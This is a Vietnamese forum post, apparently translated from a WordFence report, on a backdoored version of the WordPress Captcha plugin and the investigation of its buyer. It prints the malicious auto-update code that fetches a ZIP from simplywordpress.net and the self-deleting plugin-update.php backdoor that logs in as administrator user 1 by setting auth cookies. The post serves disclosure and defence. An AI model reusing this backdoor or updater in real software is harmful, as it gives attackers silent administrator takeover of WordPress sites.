Administrator
Administrator
Hơn 300.000 trang web đang sử dụng Plugin này
Mã:
1 function cptch_wp_plugin_auto_update()
2 {
3 require_once ('cptch_wp_auto_update.php');
4 global $cptch_plugin_info;
5
6 $wptuts_plugin_current_version = $cptch_plugin_info['Version'];
7 $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php';
8 $wptuts_plugin_slug = plugin_basename(__FILE__);
9
10 new cptch_wp_auto_update($wptuts_plugin_current_version, $wptuts_plugin_remote_path, $wptuts_plugin_slug);
11 }
Trên trang Blog WordFence cho biết " Backdoor này tạo ra một phiên với ID người dùng mang số 1 (người dùng quản trị mặc định mà WordPress tạo ra khi bạn cài đặt lần đầu tiên), tự đặt cookie xác thực và sau đó xoá chính nó"
Đoạn Mã này kích hoạt quá trình cập nhật tự động tải tệp ZIP từ https: // simplywordpress [dot] net / captcha / captcha_pro_update.php, sau đó trích xuất và tự cài đặt chính nó qua bản sao của Plugin Captcha đang chạy trên trang web Wordpress .Tệp ZIP có một vài thay đổi mã nhỏ từ những gì trong kho plugin, và nó cũng chứa một tệp tin gọi là plugin-update.php, File này chính là backdoor .
Mã:
1 < $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php';
2 ---
3 > $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_free_update.php';
Quá trình cập nhật từ xa qua giống với mã trong kho Plugin hợp pháp của Wordpress, giúp loại bỏ dấu viết của backdoor và khiến người quản trị hoặc những người đã cài đặt Plugin không thể nhận ra hacker
Mã:
1 @unlink(__FILE__);
2
3 require('../../../wp-blog-header.php');
4 require('../../../wp-includes/pluggable.php');
5 $user_info = get_userdata(1);
6 // Automatic login //
7 $username = $user_info->user_login;
8 $user = get_user_by('login', $username );
9 // Redirect URL //
10 if ( !is_wp_error( $user ) )
11 {
12 wp_clear_auth_cookie();
13 wp_set_current_user ( $user->ID );
14 wp_set_auth_cookie ( $user->ID );
15
16 $redirect_to = user_admin_url();
17 wp_safe_redirect( $redirect_to );
18
19 exit();
20 }
Ai là kẻ đứng sau mã độc Backdoor này ?
Việc bỏ ra một số tiền lớn để mua lại Plugin này hẳn phải là một kẻ có mục đích mờ ám , có thể là các nhóm tội phạm có tổ chức .
Trong khi truy tìm nhận dạng thực tế của người mua plugin Captcha, các chuyên gia nghiên cứu của WordFence đã phát hiện ra tên miền internet phục vụ các cho file backdoor được đăng ký cho một người tên là "Stacy Wellington" bằng địa chỉ email "[email protected] "
Sử dụng kỹ thuật tra cứu whois ngược lại simplewordpress.net. các nhà nghiên cứu đã phát hiện ra một số lượng lớn các Plugin thuộc nhiều lĩnh vực khác đều được đăng ký cho cùng một người dùng, bao gồm
- Covert me Popup
- Death To Comments
- Human Captcha
- Smart Recaptcha
- Social Exchange
- http://simplywordpress.net/recaptcha2/
- http://simplywordpress.net/swpopup/
- http://simplywordpress.net/recaptcha1/
Mã:
$ whois unsecuredloans4u.co.uk
2
3 Domain name:
4 unsecuredloans4u.co.uk
5 Registrant:
6 Stacy Wellington
7 ...
8 Name servers:
9 ns1.heyrank.co.uk 195.154.179.176
10 ns2.heyrank.co.uk 195.154.179.176
Lịch sử DNS của simplewordpress.net có bản ghi A trước đó là 195.154.179.176, đây là bản ghi A hiện tại cho unsecuredloans4u.co.uk. Sự thay đổi DNS này xảy ra khoảng một tháng trước (hai tháng sau khi Committer của Commcha thay đổi sang wpdevmgr2678, chủ sở hữu mới).
Hiện tại WordFence đã hợp tác với WordPress để vá phiên bản Captcha bị ảnh hưởng và chặn hacker xuất bản cập nhật, vì vậy các quản trị viên trang web được khuyến khích thay thế plugin của họ bằng phiên bản Captcha chính thức mới nhất 4.4.5.
WordFence sẽ phát hành chi tiết kỹ thuật cách backdoor cài đặt và thực thi , cung cấp các chứng cứ sau 30 ngày để các quản trị viên có đủ thời gian để vá các trang web của họ.
Đinh Quang Vinh nguồn